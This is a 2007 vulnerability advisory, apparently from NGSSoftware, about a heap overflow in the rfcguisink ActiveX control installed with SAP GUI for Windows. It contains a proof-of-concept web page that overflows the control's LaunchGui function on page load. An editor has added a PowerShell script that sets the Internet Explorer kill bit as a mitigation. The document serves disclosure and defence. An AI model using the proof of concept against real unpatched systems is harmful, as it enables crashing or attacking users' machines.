<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.3132" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>
<DIV>=======<BR>Summary<BR>=======<BR>Name: EnjoySAP, SAP GUI for Windows - Heap 
Overflow<BR>Release Date: 5 July 2007<BR>Reference: NGS00482<BR>Discoverer: 
Mark Litchfield &lt;<A 
href="mailto:mark@ngssoftware.com">mark@ngssoftware.com</A>&gt;<BR>Vendor: 
SAP<BR>Vendor Reference: SECRES-290<BR>Systems Affected: All ASCII 
Versions<BR>Risk: High<BR>Status: Fixed</DIV>
<DIV>&nbsp;</DIV>
<DIV>========<BR>TimeLine<BR>========<BR>Discovered: 4 January 
2007<BR>Released: 19 January 2007<BR>Approved: 29 January 2007<BR>Reported: 12 
January 2007<BR>Fixed: 27 March 2007<BR>Published: </DIV>
<DIV>&nbsp;</DIV>
<DIV>===========<BR>Description<BR>===========<BR>EnjoySAP, also known as Enjoy, 
is the most popular SAP GUI in use today. The<BR>latest version can be 
obtained from <A 
href="ftp://ftp.sap.com/pub/sapgui/win/">ftp://ftp.sap.com/pub/sapgui/win/</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>Given its vast size for a client (around 500MB), it is perhaps no 
surprise<BR>that installing EnjoySAP registers an astounding 1102 ActiveX 
controls.</DIV>
<DIV>&nbsp;</DIV>
<DIV>A relatively brief examination of these controls found a large number 
of<BR>instances that would terminate the EnjoySAP process, a number 
that<BR>could create files on the file system (there unfortunately exists 
no<BR>ability to inject content into these created files), and a number 
of<BR>buffer overruns.</DIV>
<DIV>&nbsp;</DIV>
<DIV>=================<BR>Technical Details<BR>=================<BR>Control - 
rfcguisink.rfcguisink.1</DIV>
<DIV>&nbsp;</DIV>
<DIV>Function - LaunchGui</DIV>
<DIV>&nbsp;</DIV>
<DIV>POC:</DIV>
<DIV>&nbsp;</DIV>
<DIV>&lt;HTML&gt;<BR>&lt;HEAD&gt;<BR>&lt;META http-equiv=Content-Type 
content="text/html; charset=windows-1252"&gt;<BR>&lt;SCRIPT 
type=text/javascript&gt;<BR>&lt;!--<BR>// build an 1800-character string and pass it as the first argument of LaunchGui<BR>function init()<BR>{<BR>&nbsp;&nbsp;var foo = "";<BR>&nbsp;&nbsp;for (var icount = 0; icount &lt; 1800; icount++)<BR>&nbsp;&nbsp;{<BR>&nbsp;&nbsp;&nbsp;&nbsp;foo = foo + "x";<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;var ngssoftware;<BR>&nbsp;&nbsp;ngssoftware = new ActiveXObject("rfcguisink.rfcguisink.1");<BR>&nbsp;&nbsp;ngssoftware["LaunchGui"](foo, 1, 1);<BR>}<BR>//--&gt;<BR>&lt;/SCRIPT&gt;<BR>&lt;/HEAD&gt;<BR>&lt;BODY 
bgColor=#ffffff onload=init()&gt;<BR>&lt;/BODY&gt;&lt;/HTML&gt;</DIV>
<DIV>&nbsp;</DIV>
<DIV>===============<BR>Fix Information<BR>===============<BR>Please ensure you 
are running the latest version of SAP GUI for Windows.</DIV>
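<DIV>&nbsp;</DIV>
<DIV>Added example, not part of the NGS advisory: on hosts that cannot take the SAP update straight away, Internet Explorer can be stopped from instantiating the control named above by setting the "kill bit" on its CLSID. The script below is this editor's own; it assumes it is run from an elevated PowerShell on the affected host and resolves the CLSID from the ProgID in the registry rather than hard-coding a value the advisory does not give.</DIV>

```powershell
# Added example: set the Internet Explorer kill bit for the rfcguisink control named
# in the advisory so IE refuses to load it from a web page. Not part of the advisory.
# Assumptions: run from an elevated (Administrator) PowerShell on the affected host.
$ProgId = 'rfcguisink.rfcguisink.1'
$KillBit = 0x400   # "Compatibility Flags" value Microsoft documents as the kill bit
# 64-bit Windows keeps a second view of the key for 32-bit Internet Explorer
$CompatPaths = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path $_ }

function Get-ClsidFromProgId {
    param([string]$ProgId)
    # The CLSID is the default value of HKCR\<ProgID>\CLSID
    $key = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
    if (-not (Test-Path $key)) { return $null }
    return (Get-ItemProperty -Path $key).'(default)'
}

function Set-ActiveXKillBit {
    param([string]$CompatPath, [string]$Clsid)
    $key = Join-Path $CompatPath $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $current = 0
    $p = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($p) { $current = [int]$p.'Compatibility Flags' }
    # OR the bit in so any flags already present on the control are preserved
    New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
        -Value ($current -bor $KillBit) -Force | Out-Null
}

function Test-ActiveXKillBit {
    param([string]$CompatPath, [string]$Clsid)
    $p = Get-ItemProperty -Path (Join-Path $CompatPath $Clsid) -Name 'Compatibility Flags' `
        -ErrorAction SilentlyContinue
    return [bool]($p -and (([int]$p.'Compatibility Flags' -band $KillBit) -eq $KillBit))
}

$clsid = Get-ClsidFromProgId $ProgId
if (-not $clsid) { Write-Host "ProgID $ProgId is not registered here; nothing to do."; exit 0 }
foreach ($path in $CompatPaths) {
    Set-ActiveXKillBit $path $clsid
    if (Test-ActiveXKillBit $path $clsid) {
        Write-Host "Kill bit set for $ProgId ($clsid) under $path"
    } else {
        Write-Error "Failed to verify kill bit for $clsid under $path"
    }
}
```

The kill bit only affects instantiation from Internet Explorer and other hosts that honour ActiveX Compatibility flags; it does not replace applying the vendor fix.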
<DIV>&nbsp;</DIV>
<DIV>NGSSoftware Insight Security Research<BR><A 
href="http://www.ngssoftware.com/">http://www.ngssoftware.com/</A><BR><A 
href="http://www.databasesecurity.com/">http://www.databasesecurity.com/</A><BR><A 
href="http://www.nextgenss.com/">http://www.nextgenss.com/</A><BR>+44(0)208 401 
0070 <BR></DIV></FONT></DIV></BODY></HTML>